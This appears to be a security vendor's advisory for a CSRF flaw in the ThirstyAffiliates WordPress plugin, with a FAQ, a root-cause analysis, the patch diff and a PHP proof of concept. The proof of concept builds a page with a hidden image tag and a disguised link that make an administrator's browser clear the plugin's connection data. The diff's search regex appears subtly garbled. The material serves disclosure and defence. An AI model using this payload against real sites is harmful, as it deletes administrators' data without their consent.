What is CVE-2026-25024?

CVE-2026-25024 is a Cross-Site Request Forgery (CSRF) vulnerability found in the ThirstyAffiliates WordPress plugin versions up to and including 3.11.9. It allows unauthenticated attackers to trick site administrators into performing unauthorized actions by exploiting missing nonce validation.

How does this vulnerability work?

The vulnerability exists in the `delete_connection_data()` function, which lacks proper nonce checks. Attackers can craft a malicious link that, when clicked by an authenticated administrator, triggers the deletion of critical connection data without their consent.

Who is affected by this vulnerability?

Any WordPress site using the ThirstyAffiliates plugin version 3.11.9 or earlier is affected. Administrators with the capability to manage options are particularly at risk if they visit malicious links.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ThirstyAffiliates plugin installed on your WordPress site. If it is version 3.11.9 or earlier, it is susceptible to this vulnerability.

How can I fix this vulnerability?

The vulnerability is patched in version 3.11.10 of the ThirstyAffiliates plugin. To mitigate the issue, update your plugin to the latest version available in the WordPress repository.

What does the severity level mean?

The vulnerability has a medium severity level with a CVSS score of 4.3. This indicates that while the risk is significant, it does not pose an immediate threat to the overall security of the site, but it should be addressed promptly.

What are the potential consequences of exploitation?

Successful exploitation allows attackers to clear critical connection data, which could disrupt affiliate link tracking and reporting features. This may lead to loss of data integrity and affect business operations reliant on the plugin.

What is nonce validation and why is it important?

Nonce validation is a security feature in WordPress that helps prevent CSRF attacks by ensuring that requests are intentional and originate from authenticated users. It adds a layer of protection by requiring a unique token for actions that modify data.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can create a page that, when visited by an administrator, automatically sends a request to delete connection data. This demonstrates the ease with which the vulnerability can be exploited without user awareness.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the ThirstyAffiliates plugin temporarily until you can apply the patch. Additionally, educate administrators to avoid clicking on suspicious links.

Is there a way to detect if exploitation has occurred?

Monitoring logs for unusual requests to the `delete_connection_data()` function or checking for missing connection data can help identify if exploitation has occurred. Regular audits of plugin activity can also assist in detecting unauthorized changes.

Where can I find more information about this vulnerability?

More information about CVE-2026-25024 can be found on the official CVE database and the WordPress plugin repository. Security blogs and forums may also provide insights and discussions regarding the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25024: ThirstyAffiliates <= 3.11.9 – Cross-Site Request Forgery (thirstyaffiliates)

CVE ID CVE-2026-25024

Plugin thirstyaffiliates

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 3.11.9

Patched Version 3.11.10

Disclosed February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25024:
The vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the ThirstyAffiliates WordPress plugin versions up to and including 3.11.9. The vulnerability exists in the connection data clearing functionality, allowing attackers to trick administrators into performing unauthorized actions via crafted requests.

Atomic Edge research identified the root cause in the `delete_connection_data()` function within `/thirstyaffiliates/Models/Authenticator.php`. The function checked only for the presence of the `ta-clear-connection-data` GET parameter and user capability (`current_user_can(‘manage_options’)`), but completely omitted WordPress nonce validation. This missing security check allowed any request with the correct parameter to trigger the `clear_connection_data()` method when initiated by an authenticated administrator, regardless of request origin.

The exploitation method involves an attacker crafting a malicious link or embedding an image tag with the specific GET parameter. When an administrator with the `manage_options` capability visits a page containing this payload, the browser automatically sends a request to the vulnerable endpoint. The attack vector uses the WordPress admin interface via the `admin_url()` function, with the payload `?ta-clear-connection-data=1` appended to the admin URL. No authentication bypass is required, as the attack relies on the victim’s existing admin session.

The patch in version 3.11.10 adds comprehensive nonce validation to the `delete_connection_data()` function. The updated code first checks for the presence of a valid `_wpnonce` parameter using `wp_verify_nonce()` with the action string `’ta-clear-connection-data’`. If the nonce is valid, the function proceeds to clear connection data. If the nonce is missing or invalid, the patch introduces a confirmation page that displays a nonced URL, preventing automatic execution. The fix transforms the vulnerable direct action into a two-step process requiring explicit user confirmation through a nonce-protected link.

Successful exploitation allows attackers to clear the ThirstyAffiliates connection data, which includes the site UUID, account email, and secret token. This action disrupts plugin functionality and may affect affiliate link tracking and reporting features. While the impact is limited to data deletion within the plugin’s specific configuration, it represents an integrity violation that could disrupt business operations for sites relying on affiliate marketing tracking.

Differential between vulnerable and patched code

Code Diff

--- a/thirstyaffiliates/Helpers/Plugin_Constants.php
+++ b/thirstyaffiliates/Helpers/Plugin_Constants.php
@@ -40,7 +40,7 @@
     // Plugin configuration constants
     const TOKEN               = 'ta';
     const INSTALLED_VERSION   = 'ta_installed_version';
-    const VERSION             = '3.11.9';
+    const VERSION             = '3.11.10';
     const TEXT_DOMAIN         = 'thirstyaffiliates';
     const THEME_TEMPLATE_PATH = 'thirstyaffiliates';
     const META_DATA_PREFIX    = '_ta_';
--- a/thirstyaffiliates/Models/Affiliate_Links_CPT.php
+++ b/thirstyaffiliates/Models/Affiliate_Links_CPT.php
@@ -1352,25 +1352,47 @@
     public function search_query( $search, $query ) {
         if ( is_admin() && $query->is_search() && $query->get( 'post_type' ) === Plugin_Constants::AFFILIATE_LINKS_CPT ) {
             global $wpdb;
-            $escaped_term = '%' . $wpdb->esc_like( $query->get( 's' ) ) . '%';
-            $search       = $wpdb->prepare(
-                "AND (
-                    (
+            $search_string = $query->get( 's' );
+            preg_match_all( '/".*?("|$)|((?<=[t ",+])|^)[^t ",+]+/', $search_string, $matches );
+            $search_terms = array_map( 'trim', array_filter($matches[0]) );
+            $search_terms = array_map( function( $term ) {
+                return trim($term, ""'nr " );
+
+            }, $search_terms);
+
+            $search = '';
+            $search_and = '';
+
+            foreach ($search_terms as $term){
+                if ( empty($term) ) {
+                    continue;
+                }
+
+                $escaped_term = '%' . $wpdb->esc_like( $term ) . '%';
+
+                $search .= $wpdb->prepare(
+                    "{$search_and}(
                         ({$wpdb->posts}.post_title LIKE %s) OR
                         ({$wpdb->posts}.post_excerpt LIKE %s) OR
                         ({$wpdb->posts}.post_content LIKE %s) OR
                         ({$wpdb->posts}.post_name LIKE %s) OR
                         (ta_pm_1.meta_value LIKE %s)
-                    )
-                ) ",
-                $escaped_term,
-                $escaped_term,
-                $escaped_term,
-                $escaped_term,
-                $escaped_term
-            );
-        }
+                    )",
+                    $escaped_term,
+                    $escaped_term,
+                    $escaped_term,
+                    $escaped_term,
+                    $escaped_term
+                );
+
+                $search_and = ' AND ';
+            }

+            if ( !empty($search) ) {
+                $search = " AND ({$search}) ";
+            }
+        }
+
         return $search;
     }

--- a/thirstyaffiliates/Models/Authenticator.php
+++ b/thirstyaffiliates/Models/Authenticator.php
@@ -141,12 +141,32 @@
    * @return void
    */
   public static function delete_connection_data() {
-    if ( isset( $_GET['ta-clear-connection-data'] ) ) {
-      // Admins only
-      if ( current_user_can( 'manage_options' ) ) {
-        self::clear_connection_data();
-      }
+    if ( ! isset( $_GET['ta-clear-connection-data'] ) ) {
+      return;
     }
+
+    // Admins only
+    if ( ! current_user_can( 'manage_options' ) ) {
+      return;
+    }
+
+    // If nonce is present and valid, perform the action.
+    if ( isset( $_GET['_wpnonce'] ) && wp_verify_nonce( $_GET['_wpnonce'], 'ta-clear-connection-data' ) ) {
+      self::clear_connection_data();
+      wp_safe_redirect( admin_url() );
+      exit;
+    }
+
+    // Show confirmation page.
+    $nonce_url = wp_nonce_url( admin_url( '?ta-clear-connection-data=1' ), 'ta-clear-connection-data' );
+    wp_die(
+      '<h1>' . esc_html__( 'Clear Connection Data', 'thirstyaffiliates' ) . '</h1>' .
+      '<p>' . esc_html__( 'Are you sure you want to clear your ThirstyAffiliates connection data? This will remove your site UUID, account email, and secret token.', 'thirstyaffiliates' ) . '</p>' .
+      '<p><a class="button button-primary" href="' . esc_url( $nonce_url ) . '">' . esc_html__( 'Yes, Clear Connection Data', 'thirstyaffiliates' ) . '</a> ' .
+      '<a class="button" href="' . esc_url( admin_url() ) . '">' . esc_html__( 'Cancel', 'thirstyaffiliates' ) . '</a></p>',
+      esc_html__( 'Confirm Action', 'thirstyaffiliates' ),
+      array( 'back_link' => false )
+    );
   }

   /**
--- a/thirstyaffiliates/Models/Script_Loader.php
+++ b/thirstyaffiliates/Models/Script_Loader.php
@@ -375,8 +375,9 @@

         if ( apply_filters( 'ta_enqueue_tajs_script' , ( get_option( 'ta_enable_link_fixer' , 'yes' ) === 'yes' || get_option( 'ta_enable_stats_reporting_module' , 'yes' ) === 'yes' ) ) ) {

-            // load main frontend script that holds the link fixer and stat record JS code
-            wp_enqueue_script( 'ta_main_js' , $this->_constants->JS_ROOT_URL() . 'app/ta.js' , array( 'jquery' ) , Plugin_Constants::VERSION , true );
+            // load main frontend script that holds the link fixer and stat record JS code
+            $suffix = defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ? '' : '.min';
+            wp_enqueue_script( 'ta_main_js' , $this->_constants->JS_ROOT_URL() . "app/ta{$suffix}.js" , array( 'jquery' ) , Plugin_Constants::VERSION , true );
             wp_localize_script( 'ta_main_js' , 'thirsty_global_vars' , array(
                 'home_url'                  => $this->_get_absolute_home_url( true ),
                 'ajax_url'                  => admin_url( 'admin-ajax.php' ),
--- a/thirstyaffiliates/thirstyaffiliates.php
+++ b/thirstyaffiliates/thirstyaffiliates.php
@@ -3,7 +3,7 @@
  * Plugin Name: ThirstyAffiliates
  * Plugin URI: http://thirstyaffiliates.com/
  * Description: ThirstyAffiliates is a revolution in affiliate link management. Collect, collate and store your affiliate links for use in your posts and pages.
- * Version: 3.11.9
+ * Version: 3.11.10
  * Requires PHP: 7.4
  * Author: Caseproof
  * Author URI: https://caseproof.com/
--- a/thirstyaffiliates/vendor-prefixed/caseproof/growth-tools/src/Helper/AddonHelper.php
+++ b/thirstyaffiliates/vendor-prefixed/caseproof/growth-tools/src/Helper/AddonHelper.php
@@ -55,7 +55,9 @@

         // Check for permissions.
         if (! current_user_can('activate_plugins')) {
-            wp_send_json_error();
+            wp_send_json_error(
+                esc_html__('Could not deactivate addon. Please check user permissions.', 'thirstyaffiliates')
+            );
         }

         if ('theme' === $addonType) {
@@ -91,7 +93,9 @@

         // Check for permissions.
         if (! current_user_can('install_plugins')) {
-            wp_send_json_error();
+            wp_send_json_error(
+                esc_html__('Could not install addon. Please check user permissions.', 'thirstyaffiliates')
+            );
         }

         // Install the addon.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25024 - ThirstyAffiliates <= 3.11.9 - Cross-Site Request Forgery

<?php
/**
 * Proof of Concept for CVE-2026-25024
 * CSRF in ThirstyAffiliates plugin <= 3.11.9
 *
 * This script generates an HTML page containing a CSRF payload.
 * When visited by an authenticated WordPress administrator,
 * it triggers the vulnerable delete_connection_data() function.
 */

// Configuration
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/'; // Change this to target site
$csrf_param = 'ta-clear-connection-data';
$csrf_value = '1';

// Construct the malicious URL
$attack_url = $target_url . '?' . $csrf_param . '=' . $csrf_value;

?>
<!DOCTYPE html>
<html>
<head>
    <title>Benign Looking Page</title>
</head>
<body>
    <h1>Security Research Page</h1>
    <p>This page demonstrates the CSRF vulnerability in ThirstyAffiliates.</p>
    
    <!-- Method 1: Automatic image load (silent exploit) -->
    <img src="<?php echo htmlspecialchars($attack_url); ?>" 
         style="display:none;" 
         alt="Hidden CSRF payload" 
         onerror="console.log('CSRF image loaded or failed - check if admin was logged in');" />
    
    <!-- Method 2: Clickable link (requires user interaction) -->
    <p>Alternatively, an attacker could use a disguised link:</p>
    <a href="<?php echo htmlspecialchars($attack_url); ?>" 
       style="color: blue; text-decoration: underline;">
        Click here for special offer
    </a>
    
    <script>
        // Log the attack attempt
        console.log('CSRF PoC loaded for CVE-2026-25024');
        console.log('Target URL: <?php echo htmlspecialchars($attack_url); ?>');
        
        // Optional: Auto-submit a form (alternative method)
        window.onload = function() {
            // This creates and submits a form if needed for POST requests
            // For this vulnerability, GET request via img tag is sufficient
            console.log('Page loaded. CSRF attempt initiated via hidden image.');
        };
    </script>
</body>
</html>

Frequently Asked Questions

What is CVE-2026-25024?
Understanding the vulnerability
CVE-2026-25024 is a Cross-Site Request Forgery (CSRF) vulnerability found in the ThirstyAffiliates WordPress plugin versions up to and including 3.11.9. It allows unauthenticated attackers to trick site administrators into performing unauthorized actions by exploiting missing nonce validation.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `delete_connection_data()` function, which lacks proper nonce checks. Attackers can craft a malicious link that, when clicked by an authenticated administrator, triggers the deletion of critical connection data without their consent.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the ThirstyAffiliates plugin version 3.11.9 or earlier is affected. Administrators with the capability to manage options are particularly at risk if they visit malicious links.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the ThirstyAffiliates plugin installed on your WordPress site. If it is version 3.11.9 or earlier, it is susceptible to this vulnerability.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 3.11.10 of the ThirstyAffiliates plugin. To mitigate the issue, update your plugin to the latest version available in the WordPress repository.
What does the severity level mean?
Understanding risk assessment
The vulnerability has a medium severity level with a CVSS score of 4.3. This indicates that while the risk is significant, it does not pose an immediate threat to the overall security of the site, but it should be addressed promptly.
What are the potential consequences of exploitation?
Impact on site operations
Successful exploitation allows attackers to clear critical connection data, which could disrupt affiliate link tracking and reporting features. This may lead to loss of data integrity and affect business operations reliant on the plugin.
What is nonce validation and why is it important?
Security mechanism explanation
Nonce validation is a security feature in WordPress that helps prevent CSRF attacks by ensuring that requests are intentional and originate from authenticated users. It adds a layer of protection by requiring a unique token for actions that modify data.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept shows how an attacker can create a page that, when visited by an administrator, automatically sends a request to delete connection data. This demonstrates the ease with which the vulnerability can be exploited without user awareness.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updating is not possible, consider disabling the ThirstyAffiliates plugin temporarily until you can apply the patch. Additionally, educate administrators to avoid clicking on suspicious links.
Is there a way to detect if exploitation has occurred?
Monitoring for signs of compromise
Monitoring logs for unusual requests to the `delete_connection_data()` function or checking for missing connection data can help identify if exploitation has occurred. Regular audits of plugin activity can also assist in detecting unauthorized changes.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-25024 can be found on the official CVE database and the WordPress plugin repository. Security blogs and forums may also provide insights and discussions regarding the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations